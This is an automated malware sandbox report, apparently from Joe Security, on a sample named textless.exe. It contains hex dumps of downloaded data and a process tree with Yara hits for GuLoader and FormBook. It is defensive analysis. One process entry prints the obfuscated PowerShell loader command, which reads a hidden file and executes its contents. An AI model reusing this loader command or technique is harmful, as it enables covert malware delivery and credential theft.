                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 30 9a 3e f9 1c 67 73 d1 19 f6 86 f9 6c 5d 75 61 69 9b 69 f0 a4 80 5f b8 7c 7a 5e 6b de 4e c6 d8 ea 7a 46 7c 97 48 38 0b f3 58 ab cb fd 1d 2a df 85 51 70 e3 d8 00 9a 39 39 ad 2a 9e 00 d2 62 9e a7 bb d2 c3 27 e0 e2 dc 07 6d 2b e7 bc 8f 0c 23 14 8c 34 9e 6b 8a 27 a3 a6 02 5d a6 5b f1 91 15 cc 00 f5 cc b0 a1 cd 74 ee 6e 50 db 97 b4 15 89 cc 4c e2 3f 50 40 85 e7 6e d5 71 02 e1 67 9f f3 38 06 4a 4b c6 aa 12 74 47 72 95 6b 23 2a f7 71 a0 90 2b 2a 01 57 81 03 14 4d 58 42 50 da 8e 93 cc 50 b6 4c f5 f7 e4 5c e4 9a 23 63 3c 2e 01 6b d2 b6 8b 03 5b 72 f7 89 af 45 da 50 fa 04 fc 34 79 33 14 d6 7a ea c3 e2 60 23 54 6e 14 a9 e5 b5 cf 3a c2 90 db 0d f0 f9 56 c9 b5 5a d9 90 fd d6 f4 77 1c fb 55 b7 00 e9 ea 4f 68 e6 82 59 a8 e3 67 da dc 35 17 ac f0 c2 2a 1d 63 cb cc 41 dc
                                                                                            Data Ascii: 0>gsl]uaii_|z^kNzF|H8X*Qp99*b'm+#4k'][tnPL?P@nqg8JKtGrk#*q+*WMXBPPL\#c<.k[rEP4y3z`#Tn:VZwUOhYg5*cA
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 83 61 b9 90 d6 e9 8b e5 a1 74 10 16 e5 96 52 be 3e ed 7d e3 29 f4 20 1d 8f db fd 90 11 9c 30 6d 83 f9 a9 d2 12 5a 7e 94 34 86 bd 4a 09 e4 8b 0a 78 8a d7 da 8a e4 dc 2c 6c c7 1d e4 3f e8 6d 6c e7 62 36 55 49 dd 17 e0 0e 96 04 7c 1a bf b6 30 a4 ae 2d 45 95 10 96 13 4d b1 75 67 cb 93 ce 4d 31 d7 f3 1c 5f 15 84 69 1c 98 ef 2a 79 0e 5d 62 cd fc ce 6c f2 00 08 91 a0 47 68 db 8a a7 af 24 84 88 61 b4 d1 74 7a 5b 03 22 d1 bb de f6 00 f4 f5 10 a9 67 8d 7b d1 07 7d 53 75 1c 81 f3 ff d5 53 ba 34 b7 d5 4a c2 05 94 59 a8 c4 af f5 dc 1a f0 b0 23 f4 43 52 6c 5f a1 a7 84 1f e7 fd 45 09 8c e8 12 52 8e 64 5b 3b b7 64 64 b0 00 69 38 0f 07 16 81 df df cd 25 b8 0c 89 1d f1 aa 91 0f ef 59 4a 0a d6 99 be f7 3f 83 d7 06 1d 48 95 ba a5 89 d4 66 02 df 03 7d b1 ea 7d 33 1e ac 03 ac
                                                                                            Data Ascii: atR>}) 0mZ~4Jx,l?mlb6UI|0-EMugM1_i*y]blGh$atz["g{}SuS4JY#CRl_ERd[;ddi8%YJ?Hf}}3
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: eb 3c 4f 92 6e 3c b8 b7 ca eb eb 0f 4b f9 35 e5 fa e0 ef 92 8b 09 01 83 71 f5 b6 fd 68 8e 48 ef 82 17 b8 ce a5 af c1 55 cf 53 c0 3f 37 c6 c7 e5 0d 6d 10 24 bf 0a 50 13 db 83 c7 88 09 15 b4 af 2b cb 5b 28 44 48 c0 05 00 b3 be c1 b5 2b 24 c9 80 51 87 4e e8 64 7a b7 0b 6b a9 33 f0 78 46 33 d2 77 a9 7f 2b 4f 97 b9 ef 44 ce 8e 23 ad 87 2a aa 36 99 04 29 4f c8 20 06 55 1e 2b 97 80 10 a7 1e d7 df a0 5e b6 3a 74 1e c6 92 31 b7 9b 57 71 2b cd 96 6f 6d 5c 04 79 21 d4 71 96 5e b3 2b ed 74 4f 6c 75 fe d9 24 18 10 25 17 87 36 c8 b5 05 ab c8 4d 13 64 97 24 6f 02 c4 4c b4 05 8e 60 58 74 81 e7 32 45 74 8f e1 a9 d1 01 fa d3 74 82 25 69 21 b7 ee 0d 09 78 ac 62 a6 53 a6 0c 14 90 c6 ee ab c9 8d f3 dc 2c 81 e2 15 f0 af a6 82 f0 2a 33 19 41 3d de 19 3c 0f 47 07 56 c7 18 7b 82
                                                                                            Data Ascii: <On<K5qhHUS?7m$P+[(DH+$QNdzk3xF3w+OD#*6)O U+^:t1Wq+om\y!q^+tOlu$%6Md$oL`Xt2Ett%i!xbS,*3A=<GV{
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 60 9a 27 a0 8d be 93 22 51 9b 0e e3 9e 2d 11 2c 66 35 db de 38 56 04 61 41 ca 95 a9 17 50 56 af d5 34 91 32 9c 90 f9 f5 3e b4 7c c9 bf 12 a1 cc ad 3b 19 4b 40 e7 4b 7a 8c ed c6 02 56 d1 ec 60 02 11 f3 75 2c 40 ac 41 2d f0 5d 84 97 2e 84 ff c2 a2 1f f4 48 8e 0b b0 9c 76 91 7d 47 87 3c 92 1c 4f 73 96 f4 0f 07 da 01 77 b3 85 d8 4a df db e2 03 34 38 c7 7b 2a e2 fb 57 8f 92 3c b3 47 c1 41 34 e4 5d c9 f2 f9 c5 ea e8 77 e6 3d af aa 47 06 24 68 11 e2 c6 dd ed 88 5b dd 0a e8 85 9f 0d 4d 29 ec 2a 5c dd c8 d3 d5 f0 90 df 7c 1e a8 88 5d 40 c9 8b 7b ba bf 20 ef 4e f9 ef 09 f1 8c c1 2b 95 7c b2 dd bb ba 92 61 b0 ac df 24 93 5c 92 bd 71 b0 15 06 ac 96 d9 aa 44 31 b3 6f d6 89 06 aa 6c 42 d9 ba ba 5a c6 94 48 7c 9b 85 3f 3a 06 84 55 fb 78 a7 cc 66 7c 7e 2a 1e 4f 0b 17 58
                                                                                            Data Ascii: `'"Q-,f58VaAPV42>|;K@KzV`u,@A-].Hv}G<OswJ48{*W<GA4]w=G$h[M)*\|]@{ N+|a$\qD1olBZH|?:Uxf|~*OX
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 64 12 f3 95 cc 7c 44 85 16 1c 41 4a ac a7 c6 14 b4 5e 33 ed 1c be df 63 ed 73 2a 25 24 20 02 35 9a 2d 70 bf 5e 27 a1 cd fa 63 86 36 42 fd 39 67 a5 04 90 58 f8 e6 07 0b 5b 55 46 f6 6e aa 83 c7 99 6f 9b cc 79 4e 56 b4 23 21 20 e7 08 43 78 ff 42 ae 66 4e 36 1c 39 f4 6b 54 7a 75 98 9b 39 b1 43 cd 97 05 40 b1 83 ca ac 4f 38 5d b8 c1 ad 89 88 82 aa 4d 1c 54 d2 fe a6 c7 7b 9e 29 9b 50 d7 c3 0e 16 63 e5 52 3e 49 be ef 07 53 36 98 42 17 d7 4a 6b e6 45 af 6b 67 bc a2 9a 1c 6e b0 eb c6 9f 0e 0c 98 ba 0d e3 64 39 e1 9b a7 1c e7 1d f0 e2 1c 6f d4 83 ac 16 d8 f6 27 25 74 c7 07 08 39 1d 93 42 62 de b3 21 d9 cc c1 18 9e 4f f0 26 a2 25 cd 04 f1 f4 5a c0 42 47 62 f1 22 4b c4 ff 84 99 20 8c 22 50 a3 1f 4b fb 23 f1 0d 5b ad f4 07 d8 c6 e9 d9 e9 ce 13 83 28 f4 ca 58 0b f7 80
                                                                                            Data Ascii: d|DAJ^3cs*%$ 5-p^'c6B9gX[UFnoyNV#! CxBfN69kTzu9C@O8]MT{)PcR>IS6BJkEkgnd9o'%t9Bb!O&%ZBGb"K "PK#[(X


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:06:23:19
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Users\user\Desktop\textless.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\textless.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:621'676 bytes
                                                                                            MD5 hash:9E8270179F04D867463A09AF7EE36E32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:06:23:19
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"
                                                                                            Imagebase:0xdc0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1507106973.0000000009D53000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:06:23:19
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff642da0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:06:23:51
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7c8b00000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:06:24:20
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Users\user\AppData\Local\Temp\Versificator.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\Versificator.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:621'676 bytes
                                                                                            MD5 hash:9E8270179F04D867463A09AF7EE36E32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 24%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:06:25:04
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\ZLQzzyNy0.exe"
                                                                                            Imagebase:0x300000
                                                                                            File size:143'872 bytes
                                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:06:25:05
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\SysWOW64\logman.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\logman.exe"
                                                                                            Imagebase:0xd0000
                                                                                            File size:98'816 bytes
                                                                                            MD5 hash:AE108F4DAAB2DD68470AC41F91A7A4E9
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:06:25:18
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\o7geodUa.exe"
                                                                                            Imagebase:0x300000
                                                                                            File size:143'872 bytes
                                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >